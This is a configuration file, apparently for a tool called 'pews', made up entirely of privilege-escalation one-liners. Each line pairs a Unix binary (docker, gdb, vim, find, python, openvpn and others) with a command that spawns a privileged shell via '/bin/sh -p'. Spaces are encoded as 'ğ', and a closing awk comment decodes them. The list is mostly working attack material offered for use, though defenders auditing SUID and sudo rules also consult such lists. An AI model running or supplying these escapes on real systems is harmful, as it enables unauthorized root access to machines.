config of pews
agetty agettyğ-oğ-pğ-lğ/bin/shğ-ağrootğtty
bash bashğ-p
busybox busyboxğsh
capsh capshğ--gid=0ğ--uid=0ğ--
chroot chrootğ/ğ/bin/shğ-p
cpulimit cpulimitğ-lğ100ğ-fğ--ğ/bin/shğ-p
csh cshğ-b
dash dashğ-p
dmsetup dmsetupğcreateğbaseğ<<EOF\nğğğğğ0ğ3534848ğlinearğ/dev/loop0ğ94208\nğğğğğEOF\nğğğğğdmsetupğlsğ--execğ'/bin/shğ-pğ-s'
docker dockerğrunğ-vğ/:/mntğ--rmğ-itğalpineğchrootğ/mntğsh
emacs emacsğ-Qğ-nwğ--evalğ'(termğ\"/bin/shğ-p\")'
env envğ/bin/shğ-p
expect expectğ-cğ'spawnğ/bin/shğ-p;ğinteract'
find findğ.ğ-execğ/bin/shğ-pğ\;ğ-quit
fish fishğ/
flock flockğ-uğ/ğ/bin/shğ-p
gcore gcoreğ$PID
gdb gdbğ-nxğ-exğ'pythonğimportğos;ğos.execl(\"/bin/sh\",ğ\"sh\",ğ\"-p\")'ğ-exğquit
gimp gimpğ-idfğ--batch-interpreter=python-fu-evalğ-bğ'importğos;ğos.execl(\"/bin/sh\",ğ\"sh\",ğ\"-p\")'
gtester TF=$(mktemp)\nğğğğğechoğ'#!/bin/shğ-p'ğ>ğ$TF\nğğğğğechoğ'execğ/bin/shğ-pğ0<&1'ğ>>ğ$TF\nğğğğğchmodğ+xğ$TF\nğğğğğsudoğgtesterğ-qğ$TF
hping3 hping3\nğğğğğ/bin/shğ-p
ionice ioniceğ/bin/shğ-p
ispell ispellğ/etc/passwd\nğğğğğ!/bin/shğ-p
jjs echoğ\"Java.type('java.lang.Runtime').getRuntime().exec('/bin/shğ-pcğ\$@|sh\${IFS}-pğ_ğechoğshğ-pğ<$(tty)ğ>$(tty)ğ2>$(tty)').waitFor()\"ğ|ğjjs
ld.so ld.soğ/bin/shğ-p
logsave logsaveğ/dev/nullğ/bin/shğ-iğ-p
make makeğ-sğ--eval=$'x:\\\n\\\t-'\"/bin/shğ-p\"
openvpn openvpnğ--devğnullğ--script-securityğ2ğ--upğ'/bin/shğ-pğ-cğ\"shğ-p\"'
nice niceğ/bin/shğ-p
node nodeğ-eğ'child_process.spawn("/bin/sh",ğ["-p"],ğ{stdio:ğ[0,ğ1,ğ2]})'
nohup nohupğ/bin/shğ-pğ-cğ"shğ-pğ<$(tty)ğ>$(tty)ğ2>$(tty)"
perl perlğ-eğ'execğ"/bin/sh";'
php phpğ-rğ\"pcntl_exec('/bin/sh',ğ['-p']);\"
perf perfğstatğ/bin/shğ-p
python pythonğ-cğ'import os;ğos.execl(\"/bin/sh\",ğ\"sh\",ğ\"-p\")'
rvim rvimğ-cğ':pyğimportğos;ğos.execl(\"/bin/sh\",ğ\"sh\",ğ\"-pc\",ğ\"reset;ğexecğshğ-p\")'
rlwrap rlwrapğ-Hğ/dev/nullğ/bin/shğ-p
run-parts run-partsğ--new-sessionğ--regexğ'^sh$'ğ/binğ--arg='-p'
rview rviewğ-cğ':pyğimportğos;ğos.execl(\"/bin/sh\",ğ\"sh\",ğ\"-pc\",ğ\"reset;ğexecğshğ-p\")'
sash sash
setarch setarchğ$(arch)ğ/bin/shğ-p
ssh-keygen ssh-keygenğ-Dğ./lib.so
strace straceğ-oğ/dev/nullğ/bin/shğ-p
sshpass sshpassğ/bin/shğ-p
start-stop-daemon start-stop-daemonğ-nğ$RANDOMğ-Sğ-xğ/bin/shğ--ğ-p
stdbuf stdbufğ-i0ğ/bin/shğ-p
timeout timeoutğ7dğ/bin/shğ-p
time timeğ/bin/shğ-p
tclsh tclsh\nğğğğğexecğ/bin/shğ-pğ<@stdinğ>@stdoutğ2>@stderr
taskset tasksetğ1ğ/bin/shğ-p
unshare unshareğ-rğ/bin/sh
vipw vipw
vimdiff vimdiffğ-cğ':pyğimportğos;ğos.execl(\"/bin/sh\",ğ\"sh\",ğ\"-pc\",ğ\"reset;ğexecğshğ-p\")'
vim vimğ-cğ':pyğimportğos;ğos.execl(\"/bin/sh\",ğ\"sh\",ğ\"-pc\",ğ\"reset;ğexecğshğ-p\")'
watch watchğ-xğshğ-cğ'reset;ğexecğshğ1>&0ğ2>&0'
vigr vigr
view viewğ-cğ':pyğimportğos;ğos.execl(\"/bin/sh\",ğ\"sh\",ğ\"-pc\",ğ\"reset;ğexecğshğ-p\")'
xargs xargsğ-ağ/dev/nullğshğ-p
zsh zsh


#awk 'c&&!--c;/config/{c=1}' pews.conf | awk '{print $2;}' | tr 'ğ' ' ' | tr -s " "

